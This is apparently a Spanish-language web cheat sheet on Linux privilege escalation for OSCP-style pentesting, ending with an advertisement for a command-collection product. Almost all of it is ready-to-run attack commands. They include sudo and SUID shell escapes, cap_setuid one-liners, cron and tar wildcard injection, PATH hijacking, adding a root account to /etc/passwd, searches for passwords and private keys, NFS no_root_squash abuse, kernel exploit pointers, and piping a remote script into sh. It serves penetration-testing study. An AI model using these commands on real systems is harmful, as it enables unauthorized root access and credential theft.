# Enumeración inicial
La escalada de privilegios es 90% enumeración. Reúne el contexto antes de tocar cualquier exploit: quién eres, qué puedes ejecutar y cómo es el sistema.
id && whoami && groupsuname -a; cat /etc/os-releasesudo -lfind / -perm -4000 -type f 2>/dev/nullgetcap -r / 2>/dev/nullcat /etc/crontab; ls -la /etc/cron.*ps aux | grep -i rootnetstat -tulpn 2>/dev/null || ss -tulpn# Explotación de sudo
Tras sudo -l, contrasta cada binario permitido con GTFOBins. Muchas herramientas cotidianas abren una shell root vía sudo.
sudo vim -c ':!/bin/sh'sudo find . -exec /bin/sh \; -quitsudo awk 'BEGIN {system("/bin/sh")}'sudo env /bin/shsudo -u#-1 /bin/bashsudo --version. Las versiones < 1.9.5p2 son vulnerables a Baron Samedit (CVE-2021-3156), un desbordamiento de heap que da root al instante.# Binarios SUID / SGID
Un binario SUID se ejecuta con los permisos de su propietario (a menudo root), sin importar quién lo lance. Enumera y explota con la sección «SUID» de GTFOBins.
find / -perm -4000 -type f 2>/dev/nullfind / -perm -2000 -type f 2>/dev/null./bash -pfind /tmp -exec /bin/sh -p \; -quitcp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash# Capabilities de Linux
Las capabilities otorgan porciones del poder de root a binarios concretos. cap_setuid es el premio gordo.
getcap -r / 2>/dev/null/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'/usr/bin/perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/sh";'# Tareas cron
Los scripts programados propiedad de root que puedes escribir — o que usan comodines explotables — son un camino clásico a root.
cat /etc/crontab; ls -la /etc/cron.d /etc/cron.dailygrep -rl "" /etc/cron* 2>/dev/null | xargs ls -la 2>/dev/nullecho 'cp /bin/bash /tmp/rb; chmod +s /tmp/rb' >> /ruta/cron_escribible.shtar czf backup.tar.gz * en un directorio escribible puede secuestrarse creando archivos con nombres de opciones tar (ej. --checkpoint-action=exec=sh rootshell.sh).# PATH Hijacking
Cuando un programa privilegiado llama a un comando sin ruta absoluta, tú controlas qué binario se ejecuta realmente.
strings /ruta/binario_suid | grep -iE 'service|cp|cat|sh|system'echo '/bin/bash -p' > /tmp/service; chmod +x /tmp/serviceexport PATH=/tmp:$PATH; /ruta/binario_suid# Credenciales y archivos sensibles
Contraseñas hardcodeadas, claves privadas y un /etc/passwd escribible aparecen en más máquinas de las que crees.
grep -rniE 'password|passwd|secret|api_key' /var/www /home /opt 2>/dev/nullfind / -name id_rsa 2>/dev/null; find / -name '*.kdbx' 2>/dev/nullls -l /etc/passwdopenssl passwd -1 -salt x hackedecho 'root2:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd; su root2cat ~/.bash_history; sudo cat /var/mail/root 2>/dev/null# Mala config NFS Root Squash
Un recurso NFS exportado con no_root_squash te permite escribir archivos como root desde una máquina que controlas.
cat /etc/exports; showmount -e OBJETIVOmount -o rw OBJETIVO:/share /mnt/nfscp /bin/bash /mnt/nfs/rootbash; chmod +s /mnt/nfs/rootbash# Exploits de kernel (último recurso)
Úsalos solo tras agotar las malas configuraciones — pueden colgar el objetivo. Haz coincidir siempre el kernel exacto de uname -r.
| Exploit | CVE | Afectado |
|---|---|---|
| DirtyPipe | CVE-2022-0847 | Kernel 5.8 – 5.16.11 |
| DirtyCow | CVE-2016-5195 | Kernel 2.6.22 – 4.8.3 |
| PwnKit (polkit) | CVE-2021-4034 | La mayoría de distros antes de 2022 |
| Baron Samedit | CVE-2021-3156 | sudo < 1.9.5p2 |
searchsploit linux kernel $(uname -r | cut -d- -f1)./PwnKit# Herramientas de enumeración automatizadas
Automatiza lo tedioso — pero entiende cada hallazgo. En el examen OSCP las herramientas automatizadas están limitadas: la habilidad manual importa.
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh./linenum.sh -t./pspy64python3 linux-exploit-suggester.py❓ FAQ escalada de privilegios Linux
Por la enumeración. Empieza con id, sudo -l, uname -a y la búsqueda SUID (find / -perm -4000). LinPEAS ayuda, pero la enumeración manual es esencial para el examen OSCP.
Ejecuta sudo -l y contrasta cada binario permitido con GTFOBins. Muchos (vim, find, awk, python) abren una shell root vía sudo. Revisa también la versión por CVE-2021-3156.
Un binario SUID se ejecuta con los permisos de su propietario (a menudo root). Encuéntralos con find / -perm -4000 2>/dev/null y consulta GTFOBins para el método de explotación SUID del binario.
Dividen el poder de root en unidades finas. Lístalas con getcap -r / 2>/dev/null. Las peligrosas como cap_setuid en python o perl permiten convertirse en root directamente.
Revisa /etc/crontab por scripts root. Si un script programado es escribible, o usa una ruta relativa o comodín que controlas, puedes inyectar comandos que se ejecutan como root.
Si un binario SUID o script cron llama a un comando sin ruta absoluta, coloca un binario malicioso con ese nombre antes en $PATH. Cuando root ejecuta el programa, tu binario corre como root.
Solo como último recurso — pueden colgar el objetivo. Agota primero las rutas de mala configuración (sudo, SUID, cron), y haz coincidir el kernel exacto de uname -a antes de compilar.
LinPEAS es un script de enumeración automatizada que resalta los vectores privesc coloreados por probabilidad. Ejecuta ./linpeas.sh y revisa los hallazgos rojos/amarillos. Complementa —no reemplaza— la enumeración manual.
📚 Recursos relacionados
- Cheatsheet OSCP — Referencia de comandos del examen OSCP, donde privesc vale el 25% de los puntos
- Cheatsheet Nmap — 100+ comandos de escaneo — el recon antes de conseguir una shell
- Cheatsheet de Pentesting completa — 200+ comandos: recon, web, explotación, Active Directory
- Glosario de Pentesting — SUID, capabilities, CVE y 60+ términos clave definidos
Convierte tus hallazgos privesc en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.
¿Quieres los 12 020+ comandos?
Esta cheatsheet privesc es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.
Empezar gratis →